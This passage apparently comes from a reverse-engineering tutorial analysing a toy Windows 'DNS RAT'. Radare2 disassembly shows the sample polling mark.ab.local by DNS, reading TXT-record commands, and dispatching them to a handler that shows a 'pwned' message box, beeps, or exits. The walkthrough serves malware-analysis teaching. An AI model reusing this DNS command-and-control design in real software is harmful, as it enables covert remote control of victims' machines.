| | 0x00401874 488d0da63700. lea rcx, str.1___WINSOCK_INITIALIZED. ; 0x405021 ; "1 - WINSOCK INITIALIZED. "
| | 0x0040187b e8b0190000 call sym.puts ; int puts(const char *s)
| | 0x00401880 41b811000000 mov r8d, 0x11 ; 17
| | 0x00401886 ba02000000 mov edx, 2
| | 0x0040188b b902000000 mov ecx, 2
| | 0x00401890 488b05dd7b00. mov rax, qword sym.imp.WS2_32.dll_socket ; [0x409474:8]=0x982a reloc.WS2_32.dll_socket ; "*\x98"
| | 0x00401897 ffd0 call rax
| | 0x00401899 488985280201. mov qword [arg_10228h], rax ; [0x10228:8]=0
| | 0x004018a0 4883bd280201. cmp qword [arg_10228h], 0xffffffffffffffff
| |,=< 0x004018a8 7517 jne 0x4018c1
| || 0x004018aa 488b05937b00. mov rax, qword sym.imp.WS2_32.dll_WSAGetLastError ; [0x409444:8]=0x97e0 reloc.WS2_32.dll_WSAGetLastError
| || 0x004018b1 ffd0 call rax
| || 0x004018b3 89c2 mov edx, eax
| || 0x004018b5 488d0d7f3700. lea rcx, str.Could_not_create_socket_:__d ; 0x40503b ; "Could not create socket : %d"
| || 0x004018bc e877190000 call sym.printf ; int printf(const char *format)
| || ; CODE XREF from 0x004018a8 (sym.main)
| |`-> 0x004018c1 488d0d903700. lea rcx, str.2___WINSOCK_SOCKET_CREATED. ; 0x405058 ; "2 - WINSOCK SOCKET CREATED. "
| | 0x004018c8 e863190000 call sym.puts ; int puts(const char *s)
| | 0x004018cd 66c785400001. mov word [arg_10040h], 2 ; [0x10040:2]=0x440
| | 0x004018d6 8b8534020100 mov eax, dword [arg_10234h] ; [0x10234:4]=0
| | 0x004018dc 0fb7c0 movzx eax, ax
| | 0x004018df 89c1 mov ecx, eax
| | 0x004018e1 488b056c7b00. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x409454:8]=0x9800 reloc.WS2_32.dll_htons
| | 0x004018e8 ffd0 call rax
| | 0x004018ea 668985420001. mov word [arg_10042h], ax ; [0x10042:2]=1
| | 0x004018f1 488d0d7d3700. lea rcx, str. ; 0x405075 ; ""
| | 0x004018f8 488b055d7b00. mov rax, qword sym.imp.WS2_32.dll_inet_addr ; [0x40945c:8]=0x9808 reloc.WS2_32.dll_inet_addr
| | 0x004018ff ffd0 call rax
| | 0x00401901 898544000100 mov dword [arg_10044h], eax ; [0x10044:4]=0
| | ; CODE XREF from 0x00401cc3 (sym.main)
| |.-> 0x00401907 8b853c020100 mov eax, dword [arg_1023ch] ; [0x1023c:4]=0
| |: 0x0040190d 89c2 mov edx, eax
| |: 0x0040190f 488d0d6c3700. lea rcx, str.Going_for_round:__d ; 0x405082 ; "Going for round: %d \n"
| |: 0x00401916 e81d190000 call sym.printf ; int printf(const char *format)
| |: 0x0040191b 488d0d763700. lea rcx, str.DNS_RAT_UP_AND_RUNNING ; 0x405098 ; "DNS RAT UP AND RUNNING "
| |: 0x00401922 e809190000 call sym.puts ; int puts(const char *s)
| |: 0x00401927 488d45b0 lea rax, [local_50h]
| |: 0x0040192b 48bf6d61726b. movabs rdi, 0x2e62612e6b72616d
| |: 0x00401935 488938 mov qword [rax], rdi
| |: 0x00401938 c740086c6f63. mov dword [rax + 8], 0x61636f6c ; [0x61636f6c:4]=-1
| |: 0x0040193f 66c7400c6c00 mov word [rax + 0xc], 0x6c ; 'l' ; [0x6c:2]=0xffff ; 108
| |: 0x00401945 48c785200201. mov qword [arg_10220h], 0 ; [0x10220:8]=0
| |: 0x00401950 48c785180201. mov qword [arg_10218h], 0 ; [0x10218:8]=0
| |: 0x0040195b 488d4520 lea rax, [arg_20h] ; 0x20 ; 32
| |: 0x0040195f 488985180201. mov qword [arg_10218h], rax ; [0x10218:8]=0
| |: 0x00401966 e825190000 call sym.getpid ; int getpid(void)
| |: 0x0040196b 0fb7c0 movzx eax, ax
| |: 0x0040196e 89c1 mov ecx, eax
| |: 0x00401970 488b05dd7a00. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x409454:8]=0x9800 reloc.WS2_32.dll_htons
| |: 0x00401977 ffd0 call rax
| |: 0x00401979 89c2 mov edx, eax
| |: 0x0040197b 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| |: 0x00401982 668910 mov word [rax], dx
| |: 0x00401985 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| |: 0x0040198c 0fb65002 movzx edx, byte [rax + 2] ; [0x2:1]=255 ; 2
| |: 0x00401990 83e27f and edx, 0x7f
| |: 0x00401993 885002 mov byte [rax + 2], dl
| |: 0x00401996 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| |: 0x0040199d 0fb65002 movzx edx, byte [rax + 2] ; [0x2:1]=255 ; 2
| |: 0x004019a1 83e287 and edx, 0xffffff87
| |: 0x004019a4 885002 mov byte [rax + 2], dl
| |: 0x004019a7 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| |: 0x004019ae 0fb65002 movzx edx, byte [rax + 2] ; [0x2:1]=255 ; 2
| |: 0x004019b2 83e2fb and edx, 0xfffffffb
| |: 0x004019b5 885002 mov byte [rax + 2], dl
| |: 0x004019b8 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| |: 0x004019bf 0fb65002 movzx edx, byte [rax + 2] ; [0x2:1]=255 ; 2
| |: 0x004019c3 83e2fd and edx, 0xfffffffd
| |: 0x004019c6 885002 mov byte [rax + 2], dl
| |: 0x004019c9 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| |: 0x004019d0 0fb65002 movzx edx, byte [rax + 2] ; [0x2:1]=255 ; 2
| |: 0x004019d4 83ca01 or edx, 1
| |: 0x004019d7 885002 mov byte [rax + 2], dl
| |: 0x004019da 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| |: 0x004019e1 0fb65003 movzx edx, byte [rax + 3] ; [0x3:1]=255 ; 3
| |: 0x004019e5 83e27f and edx, 0x7f
| |: 0x004019e8 885003 mov byte [rax + 3], dl
| |: 0x004019eb 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| |: 0x004019f2 0fb65003 movzx edx, byte [rax + 3] ; [0x3:1]=255 ; 3
| |: 0x004019f6 83e2bf and edx, 0xffffffbf
| |: 0x004019f9 885003 mov byte [rax + 3], dl
| |: 0x004019fc 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| |: 0x00401a03 0fb65003 movzx edx, byte [rax + 3] ; [0x3:1]=255 ; 3
| |: 0x00401a07 83e2df and edx, 0xffffffdf
| |: 0x00401a0a 885003 mov byte [rax + 3], dl
| |: 0x00401a0d 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| |: 0x00401a14 0fb65003 movzx edx, byte [rax + 3] ; [0x3:1]=255 ; 3
| |: 0x00401a18 83e2ef and edx, 0xffffffef
| |: 0x00401a1b 885003 mov byte [rax + 3], dl
| |: 0x00401a1e 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| |: 0x00401a25 0fb65003 movzx edx, byte [rax + 3] ; [0x3:1]=255 ; 3
| |: 0x00401a29 83e2f0 and edx, 0xfffffff0
| |: 0x00401a2c 885003 mov byte [rax + 3], dl
| |: 0x00401a2f b901000000 mov ecx, 1
| |: 0x00401a34 488b05197a00. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x409454:8]=0x9800 reloc.WS2_32.dll_htons
| |: 0x00401a3b ffd0 call rax
| |: 0x00401a3d 89c2 mov edx, eax
| |: 0x00401a3f 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| |: 0x00401a46 66895004 mov word [rax + 4], dx
| |: 0x00401a4a 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| |: 0x00401a51 66c740060000 mov word [rax + 6], 0
| |: 0x00401a57 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| |: 0x00401a5e 66c740080000 mov word [rax + 8], 0
| |: 0x00401a64 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| |: 0x00401a6b 66c7400a0000 mov word [rax + 0xa], 0
| |: 0x00401a71 488d4520 lea rax, [arg_20h] ; 0x20 ; 32
| |: 0x00401a75 4883c00c add rax, 0xc
| |: 0x00401a79 488985100201. mov qword [arg_10210h], rax ; [0x10210:8]=0
| |: 0x00401a80 488d45b0 lea rax, [local_50h]
| |: 0x00401a84 488b8d100201. mov rcx, qword [arg_10210h] ; [0x10210:8]=0
| |: 0x00401a8b 4889c2 mov rdx, rax
| |: 0x00401a8e e8bdfaffff call sym.ChangetoDnsNameFormat
| |: 0x00401a93 488b85100201. mov rax, qword [arg_10210h] ; [0x10210:8]=0
| |: 0x00401a9a 4889c1 mov rcx, rax
| |: 0x00401a9d e876170000 call sym.strlen ; size_t strlen(const char *s)
| |: 0x00401aa2 488d500d lea rdx, [rax + 0xd] ; 13
| |: 0x00401aa6 488d4520 lea rax, [arg_20h] ; 0x20 ; 32
| |: 0x00401aaa 4801d0 add rax, rdx ; '('
| |: 0x00401aad 488985200201. mov qword [arg_10220h], rax ; [0x10220:8]=0
| |: 0x00401ab4 b910000000 mov ecx, 0x10 ; 16
| |: 0x00401ab9 488b05947900. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x409454:8]=0x9800 reloc.WS2_32.dll_htons
| |: 0x00401ac0 ffd0 call rax
| |: 0x00401ac2 89c2 mov edx, eax
| |: 0x00401ac4 488b85200201. mov rax, qword [arg_10220h] ; [0x10220:8]=0
| |: 0x00401acb 668910 mov word [rax], dx
| |: 0x00401ace b901000000 mov ecx, 1
| |: 0x00401ad3 488b057a7900. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x409454:8]=0x9800 reloc.WS2_32.dll_htons
| |: 0x00401ada ffd0 call rax
| |: 0x00401adc 89c2 mov edx, eax
| |: 0x00401ade 488b85200201. mov rax, qword [arg_10220h] ; [0x10220:8]=0
| |: 0x00401ae5 66895002 mov word [rax + 2], dx
| |: 0x00401ae9 488b85100201. mov rax, qword [arg_10210h] ; [0x10210:8]=0
| |: 0x00401af0 4889c1 mov rcx, rax
| |: 0x00401af3 e820170000 call sym.strlen ; size_t strlen(const char *s)
| |: 0x00401af8 83c011 add eax, 0x11
| |: 0x00401afb 4189c0 mov r8d, eax
| |: 0x00401afe 488d4520 lea rax, [arg_20h] ; 0x20 ; 32
| |: 0x00401b02 488b8d280201. mov rcx, qword [arg_10228h] ; [0x10228:8]=0
| |: 0x00401b09 8b9538020100 mov edx, dword [arg_10238h] ; [0x10238:4]=0
| |: 0x00401b0f 89542428 mov dword [local_28h], edx
| |: 0x00401b13 488d95400001. lea rdx, [arg_10040h] ; 0x10040
| |: 0x00401b1a 4889542420 mov qword [local_20h], rdx
| |: 0x00401b1f 41b900000000 mov r9d, 0
| |: 0x00401b25 4889c2 mov rdx, rax
| |: 0x00401b28 488b053d7900. mov rax, qword sym.imp.WS2_32.dll_sendto ; [0x40946c:8]=0x9820 reloc.WS2_32.dll_sendto ; " \x98"
| |: 0x00401b2f ffd0 call rax
| |: 0x00401b31 83f8ff cmp eax, 0xffffffffffffffff
| ,===< 0x00401b34 7521 jne 0x401b57
| ||: 0x00401b36 488b05077900. mov rax, qword sym.imp.WS2_32.dll_WSAGetLastError ; [0x409444:8]=0x97e0 reloc.WS2_32.dll_WSAGetLastError
| ||: 0x00401b3d ffd0 call rax
| ||: 0x00401b3f 89c2 mov edx, eax
| ||: 0x00401b41 488d0d683500. lea rcx, str.sendto___failed_with_error_code_:__d ; 0x4050b0 ; "sendto() failed with error code : %d "
| ||: 0x00401b48 e8eb160000 call sym.printf ; int printf(const char *format)
| ||: 0x00401b4d b901000000 mov ecx, 1
| ||: 0x00401b52 e811170000 call sym.exit
| ||: ; CODE XREF from 0x00401b34 (sym.main)
| `---> 0x00401b57 488d0d783500. lea rcx, str.3___SENDTO___OK__packet_sent ; 0x4050d6 ; "3 - SENDTO() OK, packet sent"
| |: 0x00401b5e e8cd160000 call sym.puts ; int puts(const char *s)
| |: 0x00401b63 488d4520 lea rax, [arg_20h] ; 0x20 ; 32
| |: 0x00401b67 488b8d280201. mov rcx, qword [arg_10228h] ; [0x10228:8]=0
| |: 0x00401b6e 48c744242800. mov qword [local_28h], 0
| |: 0x00401b77 48c744242000. mov qword [local_20h], 0
| |: 0x00401b80 41b900000000 mov r9d, 0
| |: 0x00401b86 41b800000100 mov r8d, 0x10000
| |: 0x00401b8c 4889c2 mov rdx, rax
| |: 0x00401b8f 488b05ce7800. mov rax, qword sym.imp.WS2_32.dll_recvfrom ; [0x409464:8]=0x9814 reloc.WS2_32.dll_recvfrom
| |: 0x00401b96 ffd0 call rax
| |: 0x00401b98 83f8ff cmp eax, 0xffffffffffffffff
| ,===< 0x00401b9b 751c jne 0x401bb9
| ||: 0x00401b9d 488b05a07800. mov rax, qword sym.imp.WS2_32.dll_WSAGetLastError ; [0x409444:8]=0x97e0 reloc.WS2_32.dll_WSAGetLastError
| ||: 0x00401ba4 ffd0 call rax
| ||: 0x00401ba6 89c2 mov edx, eax
| ||: 0x00401ba8 488d0d443500. lea rcx, str.error_recving_:__d ; 0x4050f3 ; "error recving : %d"
| ||: 0x00401baf e884160000 call sym.printf ; int printf(const char *format)
| ,====< 0x00401bb4 e903010000 jmp 0x401cbc
| |||: ; CODE XREF from 0x00401b9b (sym.main)
| |`---> 0x00401bb9 488d0d483500. lea rcx, str.4___RECVFROM___OK__packet_received ; 0x405108 ; "4 - RECVFROM() OK, packet received "
| | |: 0x00401bc0 e86b160000 call sym.puts ; int puts(const char *s)
| | |: 0x00401bc5 488b85100201. mov rax, qword [arg_10210h] ; [0x10210:8]=0
| | |: 0x00401bcc 4889c1 mov rcx, rax
| | |: 0x00401bcf e844160000 call sym.strlen ; size_t strlen(const char *s)
| | |: 0x00401bd4 488d5011 lea rdx, [rax + 0x11] ; 17
| | |: 0x00401bd8 488d4520 lea rax, [arg_20h] ; 0x20 ; 32
| | |: 0x00401bdc 4801d0 add rax, rdx ; '('
| | |: 0x00401bdf 488985080201. mov qword [arg_10208h], rax ; [0x10208:8]=0
| | |: 0x00401be6 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| | |: 0x00401bed 0fb74006 movzx eax, word [rax + 6] ; [0x6:2]=0xffff ; 6
| | |: 0x00401bf1 6685c0 test ax, ax
| |,===< 0x00401bf4 0f84c2000000 je 0x401cbc
| |||: 0x00401bfa 4889e0 mov rax, rsp
| |||: 0x00401bfd 4889c7 mov rdi, rax
| |||: 0x00401c00 488d45b0 lea rax, [local_50h]
| |||: 0x00401c04 4889c1 mov rcx, rax
| |||: 0x00401c07 e80c160000 call sym.strlen ; size_t strlen(const char *s)
| |||: 0x00401c0c 83c01d add eax, 0x1d
| |||: 0x00401c0f 898504020100 mov dword [arg_10204h], eax ; [0x10204:4]=0
| |||: 0x00401c15 8b8504020100 mov eax, dword [arg_10204h] ; [0x10204:4]=0
| |||: 0x00401c1b 4898 cdqe
| |||: 0x00401c1d 0fb6440520 movzx eax, byte [rbp + rax + 0x20] ; [0x20:1]=255 ; 32
| |||: 0x00401c22 0fb6c0 movzx eax, al
| |||: 0x00401c25 898500020100 mov dword [arg_10200h], eax ; [0x10200:4]=0
| |||: 0x00401c2b 8b8500020100 mov eax, dword [arg_10200h] ; [0x10200:4]=0
| |||: 0x00401c31 4863d0 movsxd rdx, eax
| |||: 0x00401c34 4883ea01 sub rdx, 1
| |||: 0x00401c38 488995f80101. mov qword [arg_101f8h], rdx ; [0x101f8:8]=0
| |||: 0x00401c3f 4863d0 movsxd rdx, eax
| |||: 0x00401c42 4889d3 mov rbx, rdx
| |||: 0x00401c45 be00000000 mov esi, 0
| |||: 0x00401c4a 4863d0 movsxd rdx, eax
| |||: 0x00401c4d 4989d4 mov r12, rdx
| |||: 0x00401c50 41bd00000000 mov r13d, 0
| |||: 0x00401c56 4898 cdqe
| |||: 0x00401c58 4883c00f add rax, 0xf
| |||: 0x00401c5c 48c1e804 shr rax, 4
| |||: 0x00401c60 48c1e004 shl rax, 4
| |||: 0x00401c64 e837150000 call fcn.004031a0
| |||: 0x00401c69 4829c4 sub rsp, rax
| |||: 0x00401c6c 488d442430 lea rax, [arg_30h] ; 0x30 ; '0' ; 48
| |||: 0x00401c71 4883c000 add rax, 0
| |||: 0x00401c75 488985f00101. mov qword [arg_101f0h], rax ; [0x101f0:8]=0
| |||: 0x00401c7c 8b8500020100 mov eax, dword [arg_10200h] ; [0x10200:4]=0
| |||: 0x00401c82 4863c8 movsxd rcx, eax
| |||: 0x00401c85 8b8504020100 mov eax, dword [arg_10204h] ; [0x10204:4]=0
| |||: 0x00401c8b 4898 cdqe
| |||: 0x00401c8d 488d5001 lea rdx, [rax + 1] ; 1
| |||: 0x00401c91 488d4520 lea rax, [arg_20h] ; 0x20 ; 32
| |||: 0x00401c95 4801c2 add rdx, rax ; '#'
| |||: 0x00401c98 488b85f00101. mov rax, qword [arg_101f0h] ; [0x101f0:8]=0
| |||: 0x00401c9f 4989c8 mov r8, rcx
| |||: 0x00401ca2 4889c1 mov rcx, rax
| |||: 0x00401ca5 e85e150000 call sym.strncpy ; char *strncpy(char *dest, const char *src, size_t n)
| |||: 0x00401caa 488b85f00101. mov rax, qword [arg_101f0h] ; [0x101f0:8]=0
| |||: 0x00401cb1 4889c1 mov rcx, rax
| |||: 0x00401cb4 e87bf9ffff call sym.processCommand
| |||: 0x00401cb9 4889fc mov rsp, rdi
| |||: ; CODE XREF from 0x00401bb4 (sym.main)
| |||: ; CODE XREF from 0x00401bf4 (sym.main)
| ``---> 0x00401cbc 83853c020100. add dword [arg_1023ch], 1
| |`=< 0x00401cc3 e93ffcffff jmp 0x401907
| | ; CODE XREF from 0x00401851 (sym.main)
| `--> 0x00401cc8 488da5480201. lea rsp, [arg_10248h] ; 0x10248
| 0x00401ccf 5b pop rbx
| 0x00401cd0 5e pop rsi
| 0x00401cd1 5f pop rdi
| 0x00401cd2 415c pop r12
| 0x00401cd4 415d pop r13
| 0x00401cd6 5d pop rbp
\ 0x00401cd7 c3 ret
Again, this program is huge and we are not going to go line by line with this. We already know about most of the thing that is going on here, let’s see:
We see a couple of interesting things here:
| |: 0x00401922 e809190000 call sym.puts ; int puts(const char *s)
| |: 0x00401927 488d45b0 lea rax, [local_50h]
| |: 0x0040192b 48bf6d61726b. movabs rdi, 0x2e62612e6b72616d
| |: 0x00401935 488938 mov qword [rax], rdi
| | 0x004018e1 488b056c7b00. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x409454:8]=0x9800 reloc.WS2_32.dll_htons
| | 0x004018e8 ffd0 call rax
| | 0x004018ea 668985420001. mov word [arg_10042h], ax ; [0x10042:2]=1
| | 0x004018f1 488d0d7d3700. lea rcx, str. ; 0x405075 ; ""
| | 0x004018f8 488b055d7b00. mov rax, qword sym.imp.WS2_32.dll_inet_addr ; [0x40945c:8]=0x9808 reloc.WS2_32.dll_inet_addr
We see 6d61726b2e61622e == mark.ab. (0x61636f6c = local) and we also see the remote server addr. So now we know we are targeting that through DNS.
One simple approach at this point would be to actually perform the request manually ourselves and inspect the answers, but let’s see how the progam deals with that:
We see the main loop, and at the end we see this function, that seems to receive the TXT answer as parameter:
| |||: 0x00401caa 488b85f00101. mov rax, qword [arg_101f0h] ; [0x101f0:8]=0
| |||: 0x00401cb1 4889c1 mov rcx, rax
| |||: 0x00401cb4 e87bf9ffff call sym.processCommand
| |||: 0x00401cb9 4889fc mov rsp, rdi
That’ll be a nice place to inspect and set some breakpoints inside:
[0x00401634]> pdf
/ (fcn) sym.processCommand 451
| sym.processCommand (int arg_40h);
| ; var int local_80h @ rsp+0x80
| ; CALL XREF from 0x00401cb4 (sym.main)
| 0x00401634 55 push rbp
| 0x00401635 4157 push r15
| 0x00401637 4156 push r14
| 0x00401639 4155 push r13
| 0x0040163b 4154 push r12
| 0x0040163d 57 push rdi
| 0x0040163e 56 push rsi
| 0x0040163f 53 push rbx
| 0x00401640 4883ec78 sub rsp, 0x78 ; 'x'
| 0x00401644 488dac248000. lea rbp, [local_80h] ; 0x80 ; 128
| 0x0040164c 48894d40 mov qword [arg_40h], rcx ; [0x40:8]=-1 ; '@' ; 64
| 0x00401650 488b4540 mov rax, qword [arg_40h] ; [0x40:8]=-1 ; '@' ; 64
| 0x00401654 0fb600 movzx eax, byte [rax]
| 0x00401657 8845ef mov byte [local_11h], al
| 0x0040165a 807def31 cmp byte [local_11h], 0x31 ; [0x31:1]=255 ; '1' ; 49
| ,=< 0x0040165e 0f85a5000000 jne 0x401709
| | 0x00401664 4889e0 mov rax, rsp
| | 0x00401667 4889c3 mov rbx, rax
| | 0x0040166a 488b4d40 mov rcx, qword [arg_40h] ; [0x40:8]=-1 ; '@' ; 64
| | 0x0040166e e8a51b0000 call sym.strlen ; size_t strlen(const char *s)
| | 0x00401673 4883e802 sub rax, 2
| | 0x00401677 4889c2 mov rdx, rax
| | 0x0040167a 4883ea01 sub rdx, 1
| | 0x0040167e 488955e0 mov qword [local_20h_2], rdx
| | 0x00401682 488945a0 mov qword [local_60h], rax
| | 0x00401686 48c745a80000. mov qword [local_58h], 0
| | 0x0040168e 4989c6 mov r14, rax
| | 0x00401691 41bf00000000 mov r15d, 0
| | 0x00401697 4883c00f add rax, 0xf
| | 0x0040169b 48c1e804 shr rax, 4
| | 0x0040169f 48c1e004 shl rax, 4
| | 0x004016a3 e8f81a0000 call fcn.004031a0
| | 0x004016a8 4829c4 sub rsp, rax
| | 0x004016ab 488d442420 lea rax, [local_20h] ; 0x20 ; 32
| | 0x004016b0 4883c000 add rax, 0
| | 0x004016b4 488945d8 mov qword [local_28h], rax
| | 0x004016b8 488b4d40 mov rcx, qword [arg_40h] ; [0x40:8]=-1 ; '@' ; 64
| | 0x004016bc e8571b0000 call sym.strlen ; size_t strlen(const char *s)
| | 0x004016c1 488d48fe lea rcx, [rax - 2]
| | 0x004016c5 488b4540 mov rax, qword [arg_40h] ; [0x40:8]=-1 ; '@' ; 64
| | 0x004016c9 488d5002 lea rdx, [rax + 2] ; 2
| | 0x004016cd 488b45d8 mov rax, qword [local_28h]
| | 0x004016d1 4989c8 mov r8, rcx
| | 0x004016d4 4889c1 mov rcx, rax
| | 0x004016d7 e82c1b0000 call sym.strncpy ; char *strncpy(char *dest, const char *src, size_t n)
| | 0x004016dc 488b45d8 mov rax, qword [local_28h]
| | 0x004016e0 41b930000000 mov r9d, 0x30 ; '0' ; 48
| | 0x004016e6 4c8d05133900. lea r8, str.pwned ; section..rdata ; 0x405000 ; "pwned"
| | 0x004016ed 4889c2 mov rdx, rax
| | 0x004016f0 b900000000 mov ecx, 0
| | 0x004016f5 488b05387d00. mov rax, qword sym.imp.USER32.dll_MessageBoxA ; [0x409434:8]=0x97d2 reloc.USER32.dll_MessageBoxA
| | 0x004016fc ffd0 call rax
| | 0x004016fe 8945d4 mov dword [local_2ch], eax
| | 0x00401701 4889dc mov rsp, rbx
| ,==< 0x00401704 e9dc000000 jmp 0x4017e5
| || ; CODE XREF from 0x0040165e (sym.processCommand)
| |`-> 0x00401709 807def32 cmp byte [local_11h], 0x32 ; [0x32:1]=255 ; '2' ; 50
| |,=< 0x0040170d 0f85b8000000 jne 0x4017cb
| || 0x00401713 4889e0 mov rax, rsp
| || 0x00401716 4889c3 mov rbx, rax
| || 0x00401719 c745bc000000. mov dword [local_44h], 0
| || 0x00401720 488b4d40 mov rcx, qword [arg_40h] ; [0x40:8]=-1 ; '@' ; 64
| || 0x00401724 e8ef1a0000 call sym.strlen ; size_t strlen(const char *s)
| || 0x00401729 4883e802 sub rax, 2
| || 0x0040172d 4889c2 mov rdx, rax
| || 0x00401730 4883ea01 sub rdx, 1
| || 0x00401734 488955c8 mov qword [local_38h], rdx
| || 0x00401738 4989c4 mov r12, rax
| || 0x0040173b 41bd00000000 mov r13d, 0
| || 0x00401741 4889c6 mov rsi, rax
| || 0x00401744 bf00000000 mov edi, 0
| || 0x00401749 4883c00f add rax, 0xf
| || 0x0040174d 48c1e804 shr rax, 4
| || 0x00401751 48c1e004 shl rax, 4
| || 0x00401755 e8461a0000 call fcn.004031a0
| || 0x0040175a 4829c4 sub rsp, rax
| || 0x0040175d 488d442420 lea rax, [local_20h] ; 0x20 ; 32
| || 0x00401762 4883c000 add rax, 0
| || 0x00401766 488945c0 mov qword [local_40h], rax
| || 0x0040176a 488b4d40 mov rcx, qword [arg_40h] ; [0x40:8]=-1 ; '@' ; 64
| || 0x0040176e e8a51a0000 call sym.strlen ; size_t strlen(const char *s)
| || 0x00401773 488d48fe lea rcx, [rax - 2]
| || 0x00401777 488b4540 mov rax, qword [arg_40h] ; [0x40:8]=-1 ; '@' ; 64
| || 0x0040177b 488d5002 lea rdx, [rax + 2] ; 2
| || 0x0040177f 488b45c0 mov rax, qword [local_40h]
| || 0x00401783 4989c8 mov r8, rcx
| || 0x00401786 4889c1 mov rcx, rax
| || 0x00401789 e87a1a0000 call sym.strncpy ; char *strncpy(char *dest, const char *src, size_t n)
| || 0x0040178e 488b45c0 mov rax, qword [local_40h]
| || 0x00401792 488d55bc lea rdx, [local_44h]
| || 0x00401796 4989d0 mov r8, rdx
| || 0x00401799 488d15663800. lea rdx, [0x00405006] ; "%d"
| || 0x004017a0 4889c1 mov rcx, rax
| || 0x004017a3 e8781a0000 call sym.sscanf ; int sscanf(const char *s, const char *format, ...)
| || 0x004017a8 488b45c0 mov rax, qword [local_40h]
| || 0x004017ac ba84030000 mov edx, 0x384 ; 900
| || 0x004017b1 89c1 mov ecx, eax
| || 0x004017b3 488b05ba7a00. mov rax, qword sym.imp.KERNEL32.dll_Beep ; [0x409274:8]=0x9484 reloc.KERNEL32.dll_Beep
| || 0x004017ba ffd0 call rax
| || 0x004017bc b905000000 mov ecx, 5
| || 0x004017c1 e81a1a0000 call sym.sleep ; int sleep(int s)
| || 0x004017c6 4889dc mov rsp, rbx
| ,===< 0x004017c9 eb1a jmp 0x4017e5
| ||| ; CODE XREF from 0x0040170d (sym.processCommand)
| ||`-> 0x004017cb 807def33 cmp byte [local_11h], 0x33 ; [0x33:1]=255 ; '3' ; 51
| ||,=< 0x004017cf 750a jne 0x4017db
| ||| 0x004017d1 b900000000 mov ecx, 0
| ||| 0x004017d6 e88d1a0000 call sym.exit
| ||| ; CODE XREF from 0x004017cf (sym.processCommand)
| ||`-> 0x004017db b90a000000 mov ecx, 0xa
| || 0x004017e0 e8fb190000 call sym.sleep ; int sleep(int s)
| || ; CODE XREF from 0x00401704 (sym.processCommand)
| || ; CODE XREF from 0x004017c9 (sym.processCommand)
| ``--> 0x004017e5 90 nop
| 0x004017e6 488d65f8 lea rsp, [local_8h]
| 0x004017ea 5b pop rbx
| 0x004017eb 5e pop rsi
| 0x004017ec 5f pop rdi
| 0x004017ed 415c pop r12
| 0x004017ef 415d pop r13
| 0x004017f1 415e pop r14
| 0x004017f3 415f pop r15
| 0x004017f5 5d pop rbp
\ 0x004017f6 c3 ret
As you see, the recived command, will first contain a (char) number, 1, 2 or 3
And according to that number some action will be done inside this function, we can see that by examining those CMP instructions:
| 0x0040165a 807def31 cmp byte [local_11h], 0x31 ; [0x31:1]=255 ; '1' ; 49
| ,=< 0x0040165e 0f85a5000000 jne 0x401709
| | 0x00401664 4889e0 mov rax, rsp
The first one will run a MessageBox
| | 0x004016bc e8571b0000 call sym.strlen ; size_t strlen(const char *s)
| | 0x004016c1 488d48fe lea rcx, [rax - 2]
| | 0x004016c5 488b4540 mov rax, qword [arg_40h] ; [0x40:8]=-1 ; '@' ; 64
| | 0x004016c9 488d5002 lea rdx, [rax + 2] ; 2
| | 0x004016cd 488b45d8 mov rax, qword [local_28h]
| | 0x004016d1 4989c8 mov r8, rcx
| | 0x004016d4 4889c1 mov rcx, rax
| | 0x004016d7 e82c1b0000 call sym.strncpy ; char *strncpy(char *dest, const char *src, size_t n)
| | 0x004016dc 488b45d8 mov rax, qword [local_28h]
| | 0x004016e0 41b930000000 mov r9d, 0x30 ; '0' ; 48
| | 0x004016e6 4c8d05133900. lea r8, str.pwned ; section..rdata ; 0x405000 ; "pwned"
| | 0x004016ed 4889c2 mov rdx, rax
| | 0x004016f0 b900000000 mov ecx, 0
| | 0x004016f5 488b05387d00. mov rax, qword sym.imp.USER32.dll_MessageBoxA ; [0x409434:8]=0x97d2 reloc.USER32.dll_MessageBoxA
Second one will do a Sleep (and a call to an “unknown func”)
| || 0x0040172d 4889c2 mov rdx, rax
| || 0x00401730 4883ea01 sub rdx, 1
| || 0x00401734 488955c8 mov qword [local_38h], rdx
| || 0x00401738 4989c4 mov r12, rax
| || 0x0040173b 41bd00000000 mov r13d, 0
| || 0x00401741 4889c6 mov rsi, rax
| || 0x00401744 bf00000000 mov edi, 0
| || 0x00401749 4883c00f add rax, 0xf
| || 0x0040174d 48c1e804 shr rax, 4
| || 0x00401751 48c1e004 shl rax, 4
| || 0x00401755 e8461a0000 call fcn.004031a0
| || 0x0040175a 4829c4 sub rsp, rax
| || 0x0040175d 488d442420 lea rax, [local_20h] ; 0x20 ; 32
| || 0x00401762 4883c000 add rax, 0
| || 0x00401766 488945c0 mov qword [local_40h], rax
| || 0x0040176a 488b4d40 mov rcx, qword [arg_40h] ; [0x40:8]=-1 ; '@' ; 64
| || 0x0040176e e8a51a0000 call sym.strlen ; size_t strlen(const char *s)
| || 0x00401773 488d48fe lea rcx, [rax - 2]
| || 0x00401777 488b4540 mov rax, qword [arg_40h] ; [0x40:8]=-1 ; '@' ; 64
| || 0x0040177b 488d5002 lea rdx, [rax + 2] ; 2
| || 0x0040177f 488b45c0 mov rax, qword [local_40h]
| || 0x00401783 4989c8 mov r8, rcx
| || 0x00401786 4889c1 mov rcx, rax
